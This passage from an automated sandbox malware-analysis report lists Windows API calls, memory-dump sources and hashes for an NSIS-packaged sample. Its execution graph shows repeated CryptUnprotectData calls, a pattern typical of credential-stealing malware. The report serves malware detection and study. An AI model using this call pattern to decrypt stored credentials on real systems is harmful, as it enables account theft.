                                                                                                                  • API String ID: 3109718747-3343971643
                                                                                                                  • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                  • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                                  • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                  • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeGlobal
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2979337801-0
                                                                                                                  • Opcode ID: a95bd82a7adface2c2481d3f261a68eda67c11f79fb7a6eae83c2f4e147fe631
                                                                                                                  • Instruction ID: a68a5023cb72dd82efb3e1d701f95b5bfa127ea405762eeb63205557ee41f684
                                                                                                                  • Opcode Fuzzy Hash: a95bd82a7adface2c2481d3f261a68eda67c11f79fb7a6eae83c2f4e147fe631
                                                                                                                  • Instruction Fuzzy Hash: 0D51B732D001599FCF129FBCC6806AD7BBAEB4439CB50E25AE406AF144D6719E93C7B1
                                                                                                                  APIs
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED24D6
                                                                                                                    • Part of subcall function 72ED122C: lstrcpynW.KERNEL32(00000000,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED123C
                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 72ED245C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 72ED2477
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4216380887-0
                                                                                                                  • Opcode ID: 7149328553fe970a70f7899724b5e99a1ec495f5e9f6690495f740c36c34b226
                                                                                                                  • Instruction ID: 97779938154686ed7f8682b4365e68e23a14efc4eb27e6a05fcbfa8fa7707a32
                                                                                                                  • Opcode Fuzzy Hash: 7149328553fe970a70f7899724b5e99a1ec495f5e9f6690495f740c36c34b226
                                                                                                                  • Instruction Fuzzy Hash: FE41BDB5009306DFD311DF29E844B2A7BB8FB58314F50C95EF846CB582EB70A496CB62
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3808545654-0
                                                                                                                  • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                  • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                  • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                  • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1849352358-0
                                                                                                                  • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                  • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                  • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                  • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                  • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                  • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                  • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                  • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 2659869361-3936084776
                                                                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                  • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                  • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405E1E
                                                                                                                  • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405E2E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                  • String ID: 0_B
                                                                                                                  • API String ID: 3248276644-2128305573
                                                                                                                  • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                  • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                  • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                  • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                  Strings
                                                                                                                  • Error launching installer, xrefs: 004059E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                  • String ID: Error launching installer
                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                  • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                  • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                  • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                  • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403A1A,76233420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 1100898210-3936084776
                                                                                                                  • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                  • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                                  • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                  • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 72ED116A
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED11C7
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED11D9
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 72ED1203
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1780285237-0
                                                                                                                  • Opcode ID: f1fb71911fadde6b11be08000b2b95a28bcb433836419e565befee404e8e2af2
                                                                                                                  • Instruction ID: 24ea598e64b6522871639b87065798813140908fb2750e24931a6f4d93491d84
                                                                                                                  • Opcode Fuzzy Hash: f1fb71911fadde6b11be08000b2b95a28bcb433836419e565befee404e8e2af2
                                                                                                                  • Instruction Fuzzy Hash: 8D319CB65412119FD3008F7DE945B2DBBECEB05315B90992EF846DF214E735D8828BA0
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190613189-0
                                                                                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                  • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                  • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:11.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:1.8%
                                                                                                                  Total number of Nodes:328
                                                                                                                  Total number of Limit Nodes:21
                                                                                                                  execution_graph 41238 15b106 41239 15b134 41238->41239 41240 15b11a 41238->41240 41240->41239 41249 33870198 41240->41249 41253 33870188 41240->41253 41241 15b1a3 41257 35afbd48 41241->41257 41250 338701a4 41249->41250 41273 3387c638 41250->41273 41251 338701da 41251->41241 41254 338701a4 41253->41254 41256 3387c638 CryptUnprotectData 41254->41256 41255 338701da 41255->41241 41256->41255 41258 35afbd54 41257->41258 41305 35afbd98 41258->41305 41261 36272720 41262 36272730 41261->41262 41372 36270938 41262->41372 41267 36272730 41268 3627273f 41267->41268 41269 36270938 10 API calls 41268->41269 41270 36272746 41269->41270 41271 3627188c 17 API calls 41270->41271 41272 15b1b1 41271->41272 41275 3387c631 41273->41275 41274 3387caf9 41274->41251 41275->41273 41275->41274 41277 3387cf01 41275->41277 41278 3387cf10 41277->41278 41282 3387d540 41278->41282 41290 3387d550 41278->41290 41279 3387cf80 41279->41275 41283 3387d575 41282->41283 41284 3387d629 41282->41284 41283->41284 41288 3387d540 CryptUnprotectData 41283->41288 41289 3387d550 CryptUnprotectData 41283->41289 41298 3387d730 41283->41298 41302 3387d1ec 41284->41302 41288->41284 41289->41284 41291 3387d575 41290->41291 41292 3387d629 41290->41292 41291->41292 41295 3387d730 CryptUnprotectData 41291->41295 41296 3387d540 CryptUnprotectData 41291->41296 41297 3387d550 CryptUnprotectData 41291->41297 41293 3387d1ec CryptUnprotectData 41292->41293 41294 3387d7f5 41293->41294 41294->41279 41295->41292 41296->41292 41297->41292 41299 3387d745 41298->41299 41300 3387d1ec CryptUnprotectData 41299->41300 41301 3387d7f5 41300->41301 41301->41284 41303 3387d9e0 CryptUnprotectData 41302->41303 41304 3387d7f5 41303->41304 41304->41279 41306 35afbdb4 41305->41306 41310 35afce60 41306->41310 41314 35afce50 41306->41314 41307 15b1aa 41307->41261 41307->41267 41311 35afce7c 41310->41311 41318 35af94b4 41311->41318 41313 35afce9b 41313->41307 41315 35afce60 41314->41315 41316 35af94b4 3 API calls 41315->41316 41317 35afce9b 41316->41317 41317->41307 41319 35af94bf 41318->41319 41320 35afcf4f 41319->41320 41323 35afcf59 41319->41323 41327 35afcf68 41319->41327 41320->41313 41326 35afcf68 41323->41326 41324 35afd021 41324->41324 41326->41324 41331 35af95e8 41326->41331 41330 35afcf96 41327->41330 41328 35afd021 41328->41328 41329 35af95e8 3 API calls 41329->41328 41330->41328 41330->41329 41333 35af95f3 41331->41333 41332 35afec47 41332->41324 41333->41332 41335 35afe7f4 41333->41335 41337 35afe7ff 41335->41337 41336 35aff111 41336->41332 41337->41336 41340 35affaa1 41337->41340 41345 35affab0 41337->41345 41342 35affadb 41340->41342 41341 35affb8a 41341->41341 41342->41341 41350 362700c0 41342->41350 41355 362700b0 41342->41355 41346 35affadb 41345->41346 41347 35affb8a 41346->41347 41348 362700b0 3 API calls 41346->41348 41349 362700c0 3 API calls 41346->41349 41348->41347 41349->41347 41353 362700b0 3 API calls 41350->41353 41364 36270104 41350->41364 41368 36270110 41350->41368 41351 362700f5 41351->41341 41353->41351 41356 362700fd CreateWindowExW 41355->41356 41357 362700ba 41355->41357 41360 36270234 41356->41360 41361 36270104 CreateWindowExW 41357->41361 41362 362700b0 2 API calls 41357->41362 41363 36270110 CreateWindowExW 41357->41363 41358 362700f5 41358->41341 41360->41360 41361->41358 41362->41358 41363->41358 41365 36270178 CreateWindowExW 41364->41365 41367 36270234 41365->41367 41367->41367 41369 36270178 CreateWindowExW 41368->41369 41371 36270234 41369->41371 41373 36270948 41372->41373 41374 36270965 41373->41374 41381 36270980 41373->41381 41393 36270970 41373->41393 41377 3627188c 41374->41377 41379 36271897 41377->41379 41380 36272866 41379->41380 41416 36271934 41379->41416 41382 362709c6 GetCurrentProcess 41381->41382 41384 36270a11 41382->41384 41385 36270a18 GetCurrentThread 41382->41385 41384->41385 41386 36270a55 GetCurrentProcess 41385->41386 41387 36270a4e 41385->41387 41388 36270a8b 41386->41388 41387->41386 41405 36270b4f 41388->41405 41409 36270f31 41388->41409 41389 36270ab3 GetCurrentThreadId 41390 36270ae4 41389->41390 41390->41374 41394 36270980 GetCurrentProcess 41393->41394 41396 36270a11 41394->41396 41397 36270a18 GetCurrentThread 41394->41397 41396->41397 41398 36270a55 GetCurrentProcess 41397->41398 41399 36270a4e 41397->41399 41400 36270a8b 41398->41400 41399->41398 41403 36270f31 41400->41403 41404 36270b4f 2 API calls 41400->41404 41401 36270ab3 GetCurrentThreadId 41402 36270ae4 41401->41402 41402->41374 41403->41401 